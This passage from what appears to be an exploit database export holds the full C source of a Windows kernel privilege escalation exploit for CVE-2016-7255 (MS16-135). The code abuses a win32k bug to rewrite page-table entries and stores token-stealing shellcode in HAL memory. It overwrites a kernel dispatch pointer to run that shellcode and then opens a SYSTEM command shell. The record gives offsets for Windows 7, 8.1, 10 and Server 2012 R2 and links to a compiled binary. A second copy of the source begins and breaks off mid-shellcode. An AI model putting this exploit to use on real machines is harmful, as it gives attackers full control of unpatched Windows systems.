RegisterClassExW(&stWC))\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n#ifdef _WIN64\r\n\t\tpId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n\t\tpId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n\r\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n\r\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild, GetDesktopWindow());\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\r\n\t\tSwitchToThisWindow(hWndChild, TRUE);\r\n\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\r\n\t\t\t\r\n\t\t\tSetFocus(hWndParent);\r\n\t\t\t_sim_alt_esc(20);\r\n\t\t\tSetFocus(hWndChild);\r\n\t\t\t_sim_alt_esc(20);\r\n\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t\t\r\n\t\t\tif (value != 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t\r\n\r\n\t\t\t__try {\r\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\r\n\t\t\t\tif ((value & 0x67) == 0x67) {\r\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != hWndParent)\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif (NULL != hWndChild)\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n\r\n\treturn 0;\r\n}\r\n\r\nUINT64 get_pxe_address(UINT64 address) {\r\n\tUINT entry = PML4_SELF_REF_INDEX;\r\n\tUINT64 result = address >> 9;\r\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n\tresult = result | lower_boundary;\r\n\tresult = result & upper_boundary;\r\n\treturn result;\r\n}\r\n\r\nUINT64 look_free_entry_pml4(void) {\r\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n\tint offset = 0xF00;\r\n\tUINT64 pml4_search = PML4_BASE + offset;\r\n\twhile (offset < 0xFF8)\r\n\t{\r\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\r\n\t\t{\r\n\t\t\t// This is a NULL (free) entry\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\toffset += 8;\r\n\t\tpml4_search = PML4_BASE + offset;\r\n\t}\r\n\treturn pml4_search;\r\n}\r\n\r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\r\n\tUINT64 result = (\r\n\t\t((UINT64)0xFFFF << 48) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n\t\t(index << 12)\r\n\t\t);\r\n\treturn result;\r\n}\r\n\r\n\r\n\r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n\r\n\t/*\r\n\t1: kd> !pte ffffffff`ffd00000\r\n\tVA ffffffffffd00000\r\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n\t*/\t\r\n\r\n\tUINT64 pte = get_pxe_address(virtual_address);\r\n\tint pte_offset = pte & 0xFFF;\r\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n\t\r\n\tUINT64 pde = get_pxe_address(pte);\r\n\tint pde_offset = pde & 0xFFF;\r\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n\t\t\r\n\tUINT64 pdpte = get_pxe_address(pde);\r\n\tint pdpte_offset = pdpte & 0xFFF;\r\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n\t\t\r\n\tUINT64 pml4e = get_pxe_address(pdpte);\r\n\tint pml4e_offset = pml4e & 0xFFF;\r\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n\t\r\n\tUINT64 spurious_offset = look_free_entry_pml4();\r\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n\tUINT64 f_e_pml4 = spurious_offset;\r\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n\tprintf(\"--------------------------------------------------\\n\\n\");\r\n\t\r\n\t\r\n\t//Read the physical address of pml4e\t\r\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n\t// Change the PxE\r\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n\t\r\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pdpte\r\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n\t// Change the PxE\r\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pde\r\n\tUINT64 pde_addr = spurious_pt + pde_offset;\r\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n\t// Change the PxE\r\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pte\r\n\tUINT64 pte_addr = spurious_pt + pte_offset;\r\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n\t// Change the PxE\r\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n\tif (patch_original) {\r\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\r\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n\t}\r\n \r\n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\tprintf(\"\\n\\n\");\r\n\treturn spurious_pt;\r\n}\r\n\r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteAddress += (target_address & 0xFFF);\r\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n\r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteTarget += (target_address & 0xFFF);\r\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n\t*(PVOID *)target = (PVOID)hook_address;\r\n}\r\n\r\n\r\nUINT64 store_shellcode_in_hal(void) {\r\n\t//// Finally store the shellcode on the HAL\r\n\r\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n\r\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\r\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \r\n\t// 0xfff - 0xd50 = 0x2af space\r\n\r\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n\treturn 0xffffffffffd00d50;\r\n}\r\n\r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n\r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n\r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n\r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n\r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n\r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n\r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n\r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n\r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n\r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n\r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n\r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n\r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\nint __cdecl main(int argc, char** argv)\r\n{\r\n\tTCHAR pre_username[256];\r\n\tTCHAR post_username[256];\r\n\tDWORD size = 256;\r\n\tULONG Interval = 0;\r\n\tHMODULE hNtDll = NULL;\r\n\tUINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n\tint osversion;\r\n\r\n\tif (argc != 2) {\r\n\t\tprintf(\"Please enter an OS version\\n\");\r\n\t\tprintf(\"The following OS'es are supported:\\n\");\r\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\r\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\t\r\n\tosversion = _strtoui64(argv[1], NULL, 10);\r\n\t\r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \r\n }\r\n\telse if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n\tprintf(\"Current Username: %s\\n\", pre_username);\r\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n\tprintf(\"Enter to continue...\\n\");\r\n\tgetchar();\r\n\r\n\tdo\r\n\t{\r\n\t\tor_address_value_4((void*)PML4_SELF_REF);\r\n\t} while (FALSE);\r\n\r\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n\t\r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n\r\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n\tDWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n\tchar *p = shellcode;\r\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\r\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n\r\n\tp += 12; // Patch shellcode with original value in the Overwrite address\r\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n\r\n\tp += 12; // To patch the PID of our process\r\n\t\r\n\t*(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n\t\r\n\tif (osversion == 7){\r\n\t\t// Exploit Win7.1\r\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n\t\tif (!hNtDll) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\r\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n\r\n\t\tif (!NtQueryIntervalProfile) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\t\r\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\r\n\t}\r\n\r\n\t\r\n\twhile (1) {\r\n\t\tsize = 256;\r\n\t\tGetUserName(post_username, &size);\r\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\r\n\t}\r\n\tSleep(2000);\r\n\tsystem(\"cmd.exe\");\r\n\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41015/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "edition": 1, "published": "2017-01-08T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B", "href": "", "sourceData": "/*\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\n\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\n*/\n\n// ricklarabee.blogspot.com\n\n//This program is free software; you can redistribute it and/or\n//modify it under the terms of the GNU General Public License\n//as published by the Free Software Foundation.\n\n//This program is distributed in the hope that it will be useful,\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\n//GNU General Public License for more details.\n\n//You should have received a copy of the GNU General Public License\n//along with this program; if not, write to the Free Software\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n#pragma comment(lib, \"advapi32\")\n\nUINT64 PML4_BASE;\nUINT PML4_SELF_REF_INDEX;\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\n\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n\n////////////////////////////////////////////////////////\n// Define Data Types\n////////////////////////////////////////////////////////\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\n PVOID Unknown1;\n PVOID Unknown2;\n PVOID Base;\n ULONG Size;\n ULONG Flags;\n USHORT Index;\n USHORT NameLength;\n USHORT LoadCount;\n USHORT PathLength;\n CHAR ImageName[256];\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\n\ntypedef struct _SYSTEM_MODULE_INFORMATION {\n ULONG Count;\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\n\ntypedef enum _SYSTEM_INFORMATION_CLASS { \n SystemModuleInformation = 11,\n SystemHandleInformation = 16\n} SYSTEM_INFORMATION_CLASS;\n\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\n OUT PVOID SystemInformation,\n IN ULONG SystemInformationLength,\n OUT PULONG ReturnLength);\n\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\n\nNtQuerySystemInformation_t NtQuerySystemInformation;\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\n \nchar shellcode[] = {\n\t//0xcc,\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \n\t//<tag>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\n\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\t//<tag2>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\n\t0x48, 0x89, 